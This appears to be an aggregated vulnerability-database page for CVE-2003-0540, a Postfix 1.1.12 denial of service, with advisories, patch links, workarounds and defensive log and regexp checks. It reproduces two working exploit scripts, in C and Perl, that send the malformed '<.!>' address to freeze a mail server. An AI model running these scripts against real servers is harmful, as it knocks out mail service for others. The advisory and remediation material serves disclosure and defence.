CVE-2003-0540
CVSS 5.0
Published: 2003-08-27 00:00:00
Last modified: 2016-10-17 22:35:08

[Original] The address parser code in Postfix 1.1.12 and earlier allows remote attackers to cause a denial of service (lock) via (1) a malformed envelope address to a local host that would generate a bounce and contains the ".!" string in the MAIL FROM or Errors-To headers, which causes nqmgr to lock up, or (2) via a valid MAIL FROM with a RCPT TO containing a ".!" string, which causes an instance of the SMTP listener to lock up.


[CNNVD] Postfix multiple remote denial of service vulnerabilities (CNNVD-200308-157)

        
        Postfix is a mail server program.
        The Postfix mail transfer agent currently has two vulnerabilities. A remote attacker can use them to mount a denial of service against the service, or to use Postfix as a DDoS agent.
        The first vulnerability lets an attacker scan privately protected networks by a "bounce-scan" method. It is triggered by submitting an address of the following form:
         <[server_ip]:service!@local-host-name>
        This address makes Postfix connect to an arbitrary IP address and port and attempt an SMTP conversation; the failure message is returned to the remote user, leaking sensitive information. The same issue supports denial of service: a number of Postfix hosts made to connect to a particular host over and over again can bring that host down.
        The CAN ID of this vulnerability is CAN-2003-0468.
        The second vulnerability lies in the address parsing code and is triggered by supplying a malformed mail address. The attacker forces the service to queue a message to an address that generates a bounce (depending on configuration, <nonexistent@local-server-name> or, if user names are checked, <nonexistent@[127.0.0.1]>). The "mail from" or "Errors-To" address must be "<.!>" or "<.!@local-server-name>". When Postfix parses and rewrites that address while preparing the bounce, the service locks up.
        It is also possible to supply a valid "MAIL FROM" in an SMTP session and then a "RCPT TO" of the form described above, which makes the smtp listener stop responding.
        

- CVSS (base score)

CVSS score: 5 [MEDIUM]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Access complexity: [--]
Access vector: [--]
Authentication: [--]

- CPE (affected platforms and products)

cpe:/a:wietse_venema:postfix:2000-02-28
cpe:/a:wietse_venema:postfix:1.0.21
cpe:/a:wietse_venema:postfix:1.1.11
cpe:/a:wietse_venema:postfix:2001-11-15
cpe:/o:conectiva:linux:8.0  Conectiva Linux 8.0
cpe:/a:wietse_venema:postfix:1.1.12
cpe:/a:wietse_venema:postfix:1999-09-06
cpe:/o:conectiva:linux:7.0  Conectiva Linux 7.0
cpe:/a:wietse_venema:postfix:1999-12-31

- OVAL (technical details for detection)

oval:org.mitre.oval:def:544  Denial of Service Vulnerability in Postfix Parser Code
*OVAL describes in detail how to detect this vulnerability; see the referenced OVAL definition for further technical details.

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0540
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0540
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200308-157
(official data source) CNNVD

- Other links and resources

http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000717
(UNKNOWN)  CONECTIVA  CLA-2003:717
http://lists.grok.org.uk/pipermail/full-disclosure/2003-August/007693.html
(UNKNOWN)  FULLDISC  20030804 Postfix 1.1.12 remote DoS / Postfix 1.1.11 bounce scanning
http://marc.info/?l=bugtraq&m=106001525130257&w=2
(UNKNOWN)  BUGTRAQ  20030804 Postfix 1.1.12 remote DoS / Postfix 1.1.11 bounce scanning
http://marc.info/?l=bugtraq&m=106029188614704&w=2
(UNKNOWN)  TRUSTIX  2003-0029
http://www.debian.org/security/2003/dsa-363
(VENDOR_ADVISORY)  DEBIAN  DSA-363
http://www.kb.cert.org/vuls/id/895508
(UNKNOWN)  CERT-VN  VU#895508
http://www.linuxsecurity.com/advisories/engarde_advisory-3517.html
(UNKNOWN)  ENGARDE  ESA-20030804-019
http://www.mandriva.com/security/advisories?name=MDKSA-2003:081
(UNKNOWN)  MANDRAKE  MDKSA-2003:081
http://www.novell.com/linux/security/advisories/2003_033_postfix.html
(UNKNOWN)  SUSE  SuSE-SA:2003:033
http://www.redhat.com/support/errata/RHSA-2003-251.html
(VENDOR_ADVISORY)  REDHAT  RHSA-2003:251
http://www.securityfocus.com/bid/8333
(UNKNOWN)  BID  8333

- Vulnerability information

Postfix multiple remote denial of service vulnerabilities
Medium  Other
2003-08-27 00:00:00 2005-10-20 00:00:00
Remote
        
        Postfix is a mail server program.
        The Postfix mail transfer agent currently has two vulnerabilities. A remote attacker can use them to mount a denial of service against the service, or to use Postfix as a DDoS agent.
        The first vulnerability lets an attacker scan privately protected networks by a "bounce-scan" method. It is triggered by submitting an address of the following form:
         <[server_ip]:service!@local-host-name>
        This address makes Postfix connect to an arbitrary IP address and port and attempt an SMTP conversation; the failure message is returned to the remote user, leaking sensitive information. The same issue supports denial of service: a number of Postfix hosts made to connect to a particular host over and over again can bring that host down.
        The CAN ID of this vulnerability is CAN-2003-0468.
        The second vulnerability lies in the address parsing code and is triggered by supplying a malformed mail address. The attacker forces the service to queue a message to an address that generates a bounce (depending on configuration, <nonexistent@local-server-name> or, if user names are checked, <nonexistent@[127.0.0.1]>). The "mail from" or "Errors-To" address must be "<.!>" or "<.!@local-server-name>". When Postfix parses and rewrites that address while preparing the bounce, the service locks up.
        It is also possible to supply a valid "MAIL FROM" in an SMTP session and then a "RCPT TO" of the form described above, which makes the smtp listener stop responding.
        

- Advisories and patches

        Vendor patches:
        Conectiva
        ---------
        Conectiva has released security advisory CLA-2003:717 and corresponding patches:
        CLA-2003:717:postfix
        Link:
        http://distro.conectiva.com/atualizacoes/?id=a&anuncio=000717

        Patch download:
        ftp://atualizacoes.conectiva.com.br/7.0/SRPMS/postfix-1.1.13-1U70_1cl.src.rpm
        ftp://atualizacoes.conectiva.com.br/7.0/RPMS/postfix-1.1.13-1U70_1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/7.0/RPMS/postfix-doc-1.1.13-1U70_1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/8/SRPMS/postfix-1.1.13-1U80_1cl.src.rpm
        ftp://atualizacoes.conectiva.com.br/8/RPMS/postfix-1.1.13-1U80_1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/8/RPMS/postfix-doc-1.1.13-1U80_1cl.i386.rpm
        Debian
        ------
        
        http://www.debian.org/security/2003/dsa-363

        MandrakeSoft
        ------------
        MandrakeSoft has released security advisory MDKSA-2003:081 and corresponding patches:
        MDKSA-2003:081:Updated postfix packages fix remote DoS
        Link:
        http://www.linux-mandrake.com/en/security/2003/2003-081.php

        Patch download:
        Updated Packages:
        Corporate Server 2.1:
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/corporate/2.1/RPMS/postfix-1.1.13-1.1mdk.i586.rpm
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/corporate/2.1/SRPMS/postfix-1.1.13-1.1mdk.src.rpm
        Corporate Server 2.1/x86_64:
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/x86_64/corporate/2.1/RPMS/postfix-1.1.13-1.2mdk.x86_64.rpm
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/x86_64/corporate/2.1/SRPMS/postfix-1.1.13-1.2mdk.src.rpm
        Mandrake Linux 8.2:
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/8.2/RPMS/postfix-20010228-20.1mdk.i586.rpm
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/8.2/SRPMS/postfix-20010228-20.1mdk.src.rpm
        Mandrake Linux 8.2/PPC:
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/ppc/8.2/RPMS/postfix-20010228-20.1mdk.ppc.rpm
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/ppc/8.2/SRPMS/postfix-20010228-20.1mdk.src.rpm
        Mandrake Linux 9.0:
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/9.0/RPMS/postfix-1.1.13-1.1mdk.i586.rpm
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/9.0/SRPMS/postfix-1.1.13-1.1mdk.src.rpm
        Multi Network Firewall 8.2:
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/mnf8.2/RPMS/postfix-20010228-20.1mdk.i586.rpm
        ftp://download.sourceforge.net/pub/mirrors/mandrake/updates/mnf8.2/SRPMS/postfix-20010228-20.1mdk.src.rpm
        The packages above can also be downloaded from any of the mirror FTP servers listed at:
        
        http://www.mandrakesecure.net/en/ftp.php

        RedHat
        ------
        RedHat has released security advisory RHSA-2003:251-01 and corresponding patches:
        RHSA-2003:251-01:New postfix packages fix security issues.
        Link: https://www.redhat.com/support/errata/RHSA-2003-251.html
        Patch download:
        Red Hat Linux 7.3:
        SRPMS:
        ftp://updates.redhat.com/7.3/en/os/SRPMS/postfix-1.1.12-0.7.src.rpm
        i386:
        ftp://updates.redhat.com/7.3/en/os/i386/postfix-1.1.12-0.7.i386.rpm
        Red Hat Linux 8.0:
        SRPMS:
        ftp://updates.redhat.com/8.0/en/os/SRPMS/postfix-1.1.12-0.8.src.rpm
        i386:
        ftp://updates.redhat.com/8.0/en/os/i386/postfix-1.1.12-0.8.i386.rpm
        Red Hat Linux 9:
        SRPMS:
        ftp://updates.redhat.com/9/en/os/SRPMS/postfix-1.1.12-1.src.rpm
        i386:
        ftp://updates.redhat.com/9/en/os/i386/postfix-1.1.12-1.i386.rpm
        Verification:
        MD5 sum Package Name
        - --------------------------------------------------------------------------
        1c17ca698971a1b5904590b97c0cbf8f 7.3/en/os/SRPMS/postfix-1.1.12-0.7.src.rpm
        d862e447c46cc4587dc96d4d44ef1a58 7.3/en/os/i386/postfix-1.1.12-0.7.i386.rpm
        e9e79099eb8e23dc0eff8f26d059cf53 8.0/en/os/SRPMS/postfix-1.1.12-0.8.src.rpm
        48e8299644a815e5dd67e67ef9aff8b5 8.0/en/os/i386/postfix-1.1.12-0.8.i386.rpm
        4c1500d10e8533eda4168a0cd193b561 9/en/os/SRPMS/postfix-1.1.12-1.src.rpm
        b3345751920862dc4ab2e82bcc0c51f9 9/en/os/i386/postfix-1.1.12-1.i386.rpm

- Vulnerability information (22981)

Postfix 1.1.x Denial of Service Vulnerabilities (1) (EDBID:22981)
linux dos
2003-08-04 Verified
0 r3b00t
N/A
source: http://www.securityfocus.com/bid/8333/info

Debian has reported two vulnerabilities in the Postfix mail transfer agent. The first vulnerability, CAN-2003-0468, can allow for an adversary to "bounce-scan" a private network. It has also been reported that this vulnerability can be exploited to use the server as a distributed denial of service tool. These attacks are reportedly possible through forcing the server to connect to an arbitrary port on an arbitrary host. 

The second vulnerability, CAN-2003-0540, is another denial of service. It can be triggered by a malformed envelope address and can cause the queue manager to lock up until the message is removed manually from the queue. It is also reportedly possible to lock the SMTP listener, also resulting in a denial of service.

/*
 postfixdos.c for 1.1.12 by r3b00t <r3b00t@tx.pl>
 ------------------------------------------------
 remote/local Postfix up to (including) 1.1.12 DoS
 discovered by lcamtuf <lcamtuf@coredump.cx>
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>
#include <unistd.h>
#include <arpa/inet.h>

int sock = 0;

void get_response(void);
void say(char *it);

int main(int argc, char* argv[]) {
    struct hostent *hp;
    struct sockaddr_in addr;

    printf("postfixdos.c for 1.1.12 by r3b00t <r3b00t@tx.pl>\n");

    if (argc<2) {
        printf("usage: %s <smtpserver>\n", argv[0]);
        exit(0);
    }

    hp=gethostbyname(argv[1]);

    if (!hp) {
        printf("can't resolve %s\n", argv[1]);
        exit(0);
    }

    /* memset/memcpy replace the legacy bzero/bcopy of the original */
    memset(&addr, 0, sizeof(addr));

    if ((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
        printf("can't create socket\n");
        exit(0);
    }

    memcpy(&addr.sin_addr, hp->h_addr_list[0], hp->h_length);
    addr.sin_family=AF_INET;
    addr.sin_port=htons(25);

    if (connect(sock, (struct sockaddr *)&addr, sizeof(addr))!=0) {
        printf("can't connect to %s\n", argv[1]);
        close(sock);
        exit(0);
    }

    get_response();                   /* consume the 220 greeting */

    say("helo host\r\n");
    say("mail from: <.!>\r\n");       /* the malformed sender from the advisory */
    say("rcpt to: <someuser123@[127.0.0.1]>\r\n");
    /* a vulnerable listener instance stops responding at this point */

    shutdown(sock, 2);
    close(sock);

    printf("done.\n");

    return 0;
}

/* Read one server reply. The original neither checked the recv() result
   nor NUL-terminated the buffer, so printf could read past the data. */
void get_response(void) {
    char buff[65];
    ssize_t n = recv(sock, buff, sizeof(buff) - 1, 0);
    if (n <= 0) return;
    buff[n] = '\0';
    if (buff[0]!='2' && buff[0]!='3') printf("%s", buff);
}

void say(char *it) {
    send(sock, it, strlen(it), 0);
    get_response();
}


		

- Vulnerability information (22982)

Postfix 1.1.x Denial of Service Vulnerabilities (2) (EDBID:22982)
linux dos
2003-08-04 Verified
0 daniels@legend.co.uk
N/A
source: http://www.securityfocus.com/bid/8333/info
 
Debian has reported two vulnerabilities in the Postfix mail transfer agent. The first vulnerability, CAN-2003-0468, can allow for an adversary to "bounce-scan" a private network. It has also been reported that this vulnerability can be exploited to use the server as a distributed denial of service tool. These attacks are reportedly possible through forcing the server to connect to an arbitrary port on an arbitrary host.
 
The second vulnerability, CAN-2003-0540, is another denial of service. It can be triggered by a malformed envelope address and can cause the queue manager to lock up until the message is removed manually from the queue. It is also reportedly possible to lock the SMTP listener, also resulting in a denial of service.

#!/usr/bin/perl

#Remote Dos for postfix version 1.1.12
#tested on redhat 9.0, redhat 8.0, mandrake 9.0
#deadbeat,
#mail: daniels@legend.co.uk
#	 deadbeat@sdf.lonestar.org
#
#thanks..enjoy ;)

use strict;
use warnings;
use IO::Socket;

# three arguments are needed: subject, body text, SMTP host
# (the original tested $ARGV[3], which demanded a fourth argument)
if (@ARGV < 3){
   die "Usage:perl $0 <subject> <data> <smtp host to use>\n";
}
my $subject = $ARGV[0];
my $junk = $ARGV[1];
my $smtp_host = $ARGV[2];


my $helo = "HELO $smtp_host\r\n";
my $rcpt = "RCPT To:<nonexistant\@127.0.0.1>\r\n";
my $data = "DATA\n$junk\r\n";
my $sub = "Subject: $subject\r\n";
# the malformed envelope sender described in the advisory
my $from = "MAIL From:<.!\@$smtp_host>\r\n";
print "Going to connect to $smtp_host\n";
# PeerAddr was single-quoted in the original, so the variable never interpolated
my $sox = IO::Socket::INET->new(
   Proto=> 'tcp',
   PeerPort=>'25',
   PeerAddr=>$smtp_host,
) or die "cannot connect to $smtp_host: $@\n";
print "Connected...\n";
print $sox $helo;
sleep 1;
print $sox $from;
sleep 1;
print $sox $rcpt;
sleep 1;
print $sox $sub;
sleep 1;
print $sox $data;
sleep 1;
print $sox ".\r\n\r\n";
sleep 1;
close $sox;
print "Done..should lock up Postfix 1.1.12 and below ;)\n\n";
		

- Vulnerability information (F31486)

postfix.pl (PacketStormID:F31486)
2003-08-05 00:00:00
deadbeat  
exploit,remote,denial of service
CVE-2003-0540

Remote denial of service exploit that makes use of the Postfix vulnerability discussed here.

- Vulnerability information (F31483)

postfix1112.txt (PacketStormID:F31483)
2003-08-05 00:00:00
Michal Zalewski  lcamtuf.coredump.cx
advisory,remote,denial of service
CVE-2003-0540

Postfix versions 1.1.12 and below suffer from a remote denial of service attack due to a vulnerability in the address parser code.

Good morning list,                                     ,--.   ,--.
                                                       \  /-~-\  /
======================================================= )' a a `( ========
1. Posfix 1.1.12 remote DoS (CAN-2003-0540)           .(  ,---.  ),
========================================================`(_o_o_)'=========

There is a remotely exploitable denial of service vulnerability in Postfix
up to and including 1.1.12. The vulnerability does not affect the most
current version, 2.0, due to a major overhaul of the address parsing code.
Releases prior to 1.1.9 are not vulnerable by default, but will be exposed
if append_dot_mydomain is turned off in the configuration file (see
section 3 for more details).

Recent 1.1 releases, having no publicly disclosed security problems, are
still commonly used and shipped in several popular Linux distributions,
including Red Hat 9 or Debian 3.0 (woody) - those distributions both ship
1.1.11.

The vulnerability lies in the address parser code. By supplying a remote
SMTP listener with a malformed envelope address, it is possible to,
depending on the method, either:

  - Cause the queue manager, nqmgr, to lock up permanently, effectively
    stopping any queue processing - all mail traffic suppressed. Restarting
    the service has no effect - a specific entry has to be removed from
    the queue to fix the problem. For that reason, a builtin watchdog
    that restarts nqmgr after a period of nonresponsive behavior, is
    not able to cause a recovery from this condition.

    The attack can be performed by forcing the service to queue a mail
    to an address that would generate a bounce - depending on the
    configuration, it can be <nonexistent@local-server-name>, or, if user
    names are being checked, <nonexistent@[127.0.0.1]>. The "mail from" or
    "Errors-To" address should be set to "<.!>" or
    "<.!@local-server-name>". An attempt to parse and rewrite the latter
    address when preparing a bounce will lock up the service.

...or...

  - Lock up a single instance of the smtp listener in an unusable state
    that persists after the client disconnects. By repeating this,
    it is possible to DoS the service (or entire system, depending
    on the configuration) in a very effective manner.

    This can be achieved by providing any valid "MAIL FROM" in an SMTP
    conversation, and then supplying a "RCPT TO" similar to "MAIL FROM"
    in the previous example. If the server is vulnerable, the session
    should freeze at this point.

The latter approach, since it only creates a single stalled process, is a
less intrusive method of testing your systems for this issue remotely.

The attack can be detected by looking for "resolve_clnt_query: null
recipient" in your maillog. It is then necessary to find the problematic
entry in the queue and remove it manually, then restart the service.

It should be noted that it is often possible to attack instances that do
not have port 25 reachable from the Internet - envelope addresses and
certain headers such as Errors-To may very well be preserved when a
message is relayed via another system or service.
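A defender-side illustration of the detection advice in this section, added here and not part of the advisory: a small Python scanner that runs over constructed maillog lines (the syslog layout, host names and PIDs are assumptions, not real logs), reports every line carrying the "resolve_clnt_query: null recipient" indicator, and tallies which daemon logged it, since the advisory treats a stalled nqmgr (queue file must be removed by hand) differently from a stalled smtpd instance.

```python
import re
from collections import Counter

# Constructed sample maillog excerpt (not real logs); the syslog layout
# "<Mon> <day> <time> <host> postfix/<daemon>[<pid>]: <message>" and the
# host names are assumptions. The last line is deliberately truncated.
SAMPLE_MAILLOG = """\
Aug  4 10:12:01 mx1 postfix/smtpd[4121]: connect from unknown[192.0.2.10]
Aug  4 10:12:02 mx1 postfix/smtpd[4121]: warning: resolve_clnt_query: null recipient
Aug  4 10:15:40 mx1 postfix/nqmgr[918]: warning: resolve_clnt_query: null recipient
Aug  4 10:16:00 mx1 postfix/smtpd[4130]: connect from mail.example.net[198.51.100.7]
Aug  4 10:16:01 mx1 postfix/smtpd[4130]: disconnect from mail.example.net[198.51.100.7]
warning: resolve_clnt_query: null recipient
"""

# The string the advisory tells administrators to look for.
INDICATOR = "resolve_clnt_query: null recipient"

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d\d:\d\d:\d\d) (?P<host>\S+) "
    r"postfix/(?P<daemon>[\w-]+)\[(?P<pid>\d+)\]: (?P<msg>.*)$"
)


def find_lockup_indicators(log_text):
    """Return one record per log line that carries the indicator.

    Lines that contain the indicator but do not fit the expected syslog
    layout are still reported (daemon 'unknown') rather than dropped, so a
    truncated or differently formatted line cannot hide a hit.
    """
    hits = []
    for line in log_text.splitlines():
        if INDICATOR not in line:
            continue
        m = LINE_RE.match(line)
        if m is None:
            hits.append({"ts": None, "host": None, "daemon": "unknown",
                         "pid": None, "raw": line})
        else:
            hits.append({"ts": m.group("ts"), "host": m.group("host"),
                         "daemon": m.group("daemon"), "pid": m.group("pid"),
                         "raw": line})
    return hits


def summarize(hits):
    """Count hits per daemon. Per the advisory, a hit from nqmgr means the
    queue manager itself is stuck until the offending queue file is removed
    by hand; a hit from smtpd means one listener instance stalled."""
    return Counter(h["daemon"] for h in hits)


if __name__ == "__main__":
    found = find_lockup_indicators(SAMPLE_MAILLOG)
    for h in found:
        print(f"{h['ts'] or '?':>15}  {h['daemon']:<8} pid={h['pid'] or '?':<6} {h['raw']}")
    for daemon, count in summarize(found).items():
        print(f"{daemon}: {count} hit(s)")
```

Pointed at a real maillog, the per-daemon tally is the useful part: repeated smtpd hits from different PIDs indicate listener instances being stalled one after another, while an nqmgr hit is the case where restarting does not help and the queue entry has to be found and removed.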


==========================================================================
2. Postfix 1.1.11 Bounce scan / DDoS agent issue (CAN-2003-0468)
==========================================================================

There is a remotely exploitable vulnerability in Postfix 1.1.11 (and
earlier versions). Postfix 1.1.12 and 2.0 are NOT affected. The problem was
apparently spotted and fixed in 1.1.12 (note 200221121 in HISTORY file),
although it has been tagged as a change preventing bogus log entries, and
not described as a security issue; there was no public information or
discussion about its implications on security forums, not prompting users
to upgrade. It might be that the significance of this problem was simply
overlooked.

Since the issue has been rediscovered during the analysis of the previous
issue, I decided it's worth mentioning here, especially since 1.1.11 is
shipped all over the place.

The problem enables an attacker to use Postfix 1.1.11 as a DDoS agent or
for bounce scans of other hosts on the Internet, or probing firewalled
internal networks. The problem is triggered by an attempt to deliver to:

  <[server_ip]:service!@local-host-name>

This address will cause Postfix to connect an arbitrary IP at an arbitrary
port and attempt to talk SMTP. The conversation will likely fail before
any user-dependent data is sent to the remote party, which limits the
exposure, but is sufficient to bounce-scan.

The address can be either sent in "RCPT TO" (the attacker would have the
right to relay to this system - which makes it a viable method of
bounce-scanning your ISP/mail account provider), in which case the sender
would then look for bounces stating the problem (SMTP conversation error,
connection timeout or connection refused), or in "MAIL FROM" / Errors-To,
in which case, the attacker can likely perform a queue timing attack to
detect whether a port is open by inserting control messages that are
intended to bounce.

When a port is open, SMTP greeting timeout occurs after a longer while,
pausing queue processing. When a port is closed, the entry is immediately
marked as deferred and queue processing continues.

It is also possible to use this problem to stage a DDoS attack, by making
a number of Postfix hosts around the world attempt to connect services on
a particular machine over and over again, until each queue entry finally
expires and is discarded or delivered to postmaster.


==========================================================================
3. Vendor status / fix and workaround information
==========================================================================

Wietse Venema has been contacted on July 27 regarding the first issue,
confirmed the problem described in #1 and released a patch to address it.
The information was then passed down to vendor-sec.

Below is a detailed fix and workaround info from the author:

  To find out your Postfix version, use the command "postconf
  mail_version".  Versions prior to 1.1 show a date instead of a
  version number (e.g., Postfix-20010228-pl08). Versions 1.1 and
  later may show a date in addition to the version number (e.g.,
  2.0.14-20030717).

  Postfix versions 2.0 and later:

    Not vulnerable, because the trivial-rewrite code was completely
    restructured. The current Postfix version is 2.0.13.

    A not vulnerable Postfix version can protect vulnerable Postfix
    systems as described in the workarounds section below.

  Postfix versions 1.1.9 .. 1.1.12:

    These are vulnerable, and are fixed by upgrading to version
    1.1.13 which will be made available via http://www.postfix.org/
    and via individual vendors, or by applying the patch below.
    The workarounds section below has instructions for sites that
    cannot upgrade Postfix immediately.

  Postfix versions prior to 1.1.9:

    These become vulnerable only when the append_dot_mydomain
    feature is set to "no" (you can verify this with the command
    "postconf append_dot_mydomain"). Use the command "postconf -e
    append_dot_mydomain=yes" to update the setting if necessary.

    Sites that must use "append_dot_mydomain=no" should either
    upgrade to a fixed Postfix version, or should apply the one-line
    patch at the end of this text. This patch has been tested with
    Postfix versions back to 19991231.

  Workarounds for Postfix versions 1.1.9 - 1.1.12:

    Verify that the append_dot_mydomain feature is set to "yes" by
    using the command "postconf append_dot_mydomain". Use the
    command "postconf -e append_dot_mydomain=yes" to update the
    setting if necessary.

    Sites that must use "append_dot_mydomain=no" should either
    upgrade to a fixed Postfix version, or should apply the one-line
    patch at the end of this text.

    Specify "resolve_dequoted_address=no" in main.cf.

    An additional workaround is needed for hosts that must forward
    mail from the Internet to, for example, primary MX hosts or to
    internal hosts.  This is because with resolve_dequoted_address=no,
    Postfix no longer recognizes user@bad.domain@good.domain as a
    mail relaying attempt.  To close this loophole, use a regular
    expression to block sender-specified routing in SMTP recipient
    addresses:

        /etc/postfix/main.cf:
            smtpd_recipient_restrictions =
                permit_mynetworks,
                check_recipient_access regexp:/etc/postfix/recipient_regexp
                ...other restrictions...
                check_relay_domains

        /etc/postfix/recipient_regexp:
            /[%!@].*[%!@]/       550 Sender-specified routing rejected

  Workarounds to protect vulnerable down-stream Postfix systems:

    Reject Errors-To: message headers with multiple routing
    operators:

        /etc/postfix/main.cf:
            header_checks = regexp:/etc/postfix/header_checks

        /etc/postfix/header_checks:
            /^errors-to:.*[%!@].*[%!@]/        reject

    Reject SMTP sender addresses with multiple routing operators:

        /etc/postfix/main.cf:
            smtpd_sender_restrictions =
                check_sender_access regexp:/etc/postfix/sender_regexp
                ...other restrictions...

        /etc/postfix/sender_regexp:
            /[%!@].*[%!@]/       550 Sender-specified routing rejected
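The regexp tables from the workarounds above, exercised as an added example that is not part of the advisory or of Postfix itself: a Python emulation of the simple "/pattern/ action" lookup, with Postfix's default case-insensitive matching and first-match-wins semantics, applied to constructed addresses and header lines. The sample addresses and host names (example.com, mx.example.com) are placeholders, and the emulator handles only the plain table lines used in this section, not the full regexp_table syntax.

```python
import re

# The three tables from the workaround section above, reproduced verbatim.
RECIPIENT_REGEXP = "/[%!@].*[%!@]/       550 Sender-specified routing rejected\n"
SENDER_REGEXP = "/[%!@].*[%!@]/       550 Sender-specified routing rejected\n"
HEADER_CHECKS = "/^errors-to:.*[%!@].*[%!@]/        reject\n"

# Only the simple "/pattern/ action" line form is handled (no '!' negation,
# no if/endif blocks); this is an assumed subset sufficient for the tables above.
TABLE_LINE = re.compile(r"^/(?P<pat>(?:\\/|[^/])*)/\s+(?P<action>.+)$")


def load_regexp_table(text):
    """Compile a Postfix-style regexp table. Postfix regexp tables match
    case-insensitively unless a flag says otherwise, so IGNORECASE is used."""
    rules = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = TABLE_LINE.match(line)
        if m is None:
            raise ValueError(f"unsupported table line: {raw!r}")
        rules.append((re.compile(m.group("pat"), re.IGNORECASE),
                      m.group("action").strip()))
    return rules


def lookup(rules, key):
    """First matching pattern wins, as in Postfix; None means no rule matched."""
    for pattern, action in rules:
        if pattern.search(key):
            return action
    return None


def check_address(rules, envelope_address):
    """smtpd access checks see the envelope address without its angle brackets."""
    return lookup(rules, envelope_address.strip().strip("<>"))


def check_header(rules, header_line):
    """header_checks see the whole 'Name: value' header line."""
    return lookup(rules, header_line)


if __name__ == "__main__":
    recipient_rules = load_regexp_table(RECIPIENT_REGEXP)
    sender_rules = load_regexp_table(SENDER_REGEXP)
    header_rules = load_regexp_table(HEADER_CHECKS)

    # Constructed samples; example.com / mx.example.com are placeholders.
    for addr in ["<user@example.com>",
                 "<user@bad.domain@good.domain>",   # the relaying loophole the table closes
                 "<user%target.example@mx.example.com>"]:
        print(f"RCPT TO {addr:<40} -> {check_address(recipient_rules, addr)}")
    for addr in ["<bounces@example.com>", "<.!@mx.example.com>", "<.!>"]:
        print(f"MAIL FROM {addr:<38} -> {check_address(sender_rules, addr)}")
    for hdr in ["Errors-To: <.!@mx.example.com>", "Errors-To: bounces@example.com"]:
        print(f"{hdr:<48} -> {check_header(header_rules, hdr)}")
```

Running it shows that addresses and Errors-To headers carrying two routing operators (user@bad.domain@good.domain, .!@host) are rejected while ordinary addresses pass. It also shows that the bare "<.!>" sender form from section 1 contains a single routing operator and therefore matches none of these patterns: the tables close the relaying loophole opened by resolve_dequoted_address=no and shield downstream hosts from the two-operator forms, and the upgrade or the one-line patch remains the actual fix.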

diff -cr /tmp/postfix-1.1.12/src/trivial-rewrite/resolve.c src/trivial-rewrite/resolve.c
*** /tmp/postfix-1.1.12/src/trivial-rewrite/resolve.c	Fri Nov 22 12:32:33 2002
--- src/trivial-rewrite/resolve.c	Mon Jul 28 11:36:49 2003
***************
*** 148,153 ****
--- 148,154 ----
  	    if (saved_domain)
  		tok822_free_tree(saved_domain);
  	    saved_domain = domain;
+ 	    domain = 0;
  	}

  	/*
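Review bot: the added `domain = 0;` after `saved_domain = domain;` hands the token tree over to `saved_domain`, but nothing in the hunk records that intent; a one-line comment such as `/* saved_domain now owns the tree */` would keep a later cleanup from deleting an assignment that looks redundant next to the `tok822_free_tree(saved_domain)` call above it. The hunk is offset against 1.1.12 (lines 148-154 of src/trivial-rewrite/resolve.c) while the advisory says the patch has been tested back to 19991231, so sites on older trees should expect to apply it by hand if the context lines do not line up.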

-- 
Did you know that clones never use mirrors?
http://lcamtuf.coredump.cx/photo/current/


- Vulnerability information

10544
Postfix Malformed Envelope Address nqmgr DoS
Denial of Service
Loss of Availability

- Vulnerability description

Unknown or Incomplete

- Timeline

2003-08-03 Unknown
Unknown Unknown

- Solution

Unknown or Incomplete

- References

- Vulnerability author

Unknown or Incomplete

- Vulnerability information

Postfix SMTP Malformed E-mail Envelope Address Denial of Service Vulnerability
Failure to Handle Exceptional Conditions 8362
Yes No
2003-08-04 12:00:00 2009-07-11 10:56:00
Discovery credited to Michal Zalewski.

- Affected program versions

Wietse Venema Postfix 1.1.13
Wietse Venema Postfix 1.1.12
+ S.u.S.E. Linux 8.1
+ S.u.S.E. Linux 8.0
+ S.u.S.E. Linux 7.3 sparc
+ S.u.S.E. Linux 7.3 ppc
+ S.u.S.E. Linux 7.3 i386
+ S.u.S.E. Linux 7.2 i386
Wietse Venema Postfix 1.1.11
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 alpha
+ Debian Linux 3.0
Wietse Venema Postfix 1.0.21
+ EnGarde Secure Community 2.0
+ EnGarde Secure Community 1.0.1
+ EnGarde Secure Professional 1.5
+ EnGarde Secure Professional 1.2
+ EnGarde Secure Professional 1.1
Wietse Venema Postfix 20011115
Wietse Venema Postfix 20010228
+ Trustix Secure Linux 1.5
Wietse Venema Postfix 19991231
+ Debian Linux 2.2 sparc
+ Debian Linux 2.2 powerpc
+ Debian Linux 2.2 IA-32
+ Debian Linux 2.2 arm
+ Debian Linux 2.2 alpha
+ Debian Linux 2.2 68k
+ Trustix Secure Linux 1.2
Wietse Venema Postfix 19990906
Conectiva Linux 8.0
Conectiva Linux 7.0
